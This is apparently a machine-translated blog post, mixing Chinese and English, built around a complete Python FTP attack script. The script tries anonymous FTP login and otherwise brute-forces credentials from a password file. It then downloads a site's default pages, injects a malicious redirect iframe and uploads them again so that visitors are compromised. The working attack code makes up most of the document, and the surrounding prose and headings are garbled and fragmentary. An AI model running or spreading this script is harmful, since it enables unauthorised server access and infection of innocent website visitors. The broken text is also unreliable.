目錄
一、最後一步:
分析:
二、完整
分析:
分析:
The final step of the entire attack:attack()函數
1、attack()The input parameter of the function includes a username、密碼、hostname and redirect location.The function first uses the username/密碼登錄FTP 服務器.
2、 This script will search the default web page,and download each page found, and add malicious redirection code to it.
3、 The script will return the web page that was hung upFTP 服務器, 任何訪問該Web Server machines will be hacked
def attack(username, password, tgtHost, redirect): ftp = ftplib.FTP(tgtHost) ftp.login(username, password) defPages = returnDefault(ftp) for defPage in defPages: injectPage(ftp, defPage, redirect)
分析:
Parse code by adding some command line arguments, To complete the entire script
首先看FTP Can the server be accessed anonymously?.不能, brute force password,Can crack passwords orFTP Can log in anonymously, 登錄到FTP attack on the site.despite only a few hundred lines of code, but it completely replicatesk985ytv Attack vector used in the attack.
import ftplib import optparse import time def anonLogin(hostname): try: ftp = ftplib.FTP(hostname) ftp.login('anonymous', 'password') print('\n(*) ' + str(hostname) + ' FTP Anonymous Logon Succeeded.') ftp.quit() return True except Exception as e: print('[*]' + str(e)) print('\n[-]' + str(hostname) + 'FTP Anonymous Logon Failed.') return False def bruteLogin(hostname, passwdFile): pF = open(passwdFile, 'r') for line in pF.readlines(): time.sleep(1) userName = line.split(':')[0] passWord = line.split(':')[1].strip('\r').strip('\n') print('[+] Trying: ' + userName + '/' + passWord) try: ftp = ftplib.FTP(hostname) ftp.login(userName, passWord) print('\n[*] ' + str(hostname) + ' FTP Logon Succeeded: ' + userName + '/' + passWord) ftp.quit() return (userName, passWord) except Exception as e: pass print('\n[-] Could not brute force FTP credentials') return (None, None) def returnDefault(ftp): try: dirList = ftp.nlst() except: dirList = [] print('[-] Could not list directory contents.') print('[-] Skipping To Next Target.') return retList = [] for fileName in dirList: fn = fileName.lower() if '.php' in fn or '.htm' in fn or '.asp' in fn: print('[+] Found default page: ' + fileName) retList.append(fileName) return retList def injectPage(ftp, page, redirect): f = open(page + '.tmp', 'w') ftp.retrlines('RETR ' + page, f.write) print('[+] Downloaded Page: ' + page) f.write(redirect) f.close() print('[+] Injected Malicious IFrame on: ' + page) ftp.storlines('STOR ' + page, open(page + '.tmp')) print('[+] Uploaded Injected Page: ' + page) def attack(username, password, tgtHost, redirect): ftp = ftplib.FTP(tgtHost) ftp.login(username, password) defPages = returnDefault(ftp) for defPage in defPages: injectPage(ftp, defPage, redirect) def main(): parser = optparse.OptionParser('usage%prog ' + '-H <target host[s]> -r <redirect page>' + '[ -f <userpass file>]') parser.add_option('-H', dest='tgtHosts', type='string', help='specify target host') parser.add_option('-f', dest='passwdFile', type='string', help='specify user/password file') parser.add_option('-r', dest='redirect', type='string', help='specify a redirection page') (options, args) = parser.parse_args() tgtHosts = str(options.tgtHosts).split(', ') passwdFile = options.passwdFile redirect = options.redirect if tgtHosts == None or redirect == None: print(parser.usage) exit(0) for tgtHost in tgtHosts: username = None password = None if anonLogin(tgtHost) == True: username = 'anonymous' password = '' print('[+] Using Anonymous Creds to attack') attack(username, password, tgtHost, redirect) elif passwdFile != None: (username, password) = \ bruteLogin(tgtHost, passwdFile) if password != None: print('[+] Using Creds: ' + username + '/' + password + ' to attack') attack(username, password, tgtHost, redirect) if __name__ == '__main__': main()
To help you in 6 month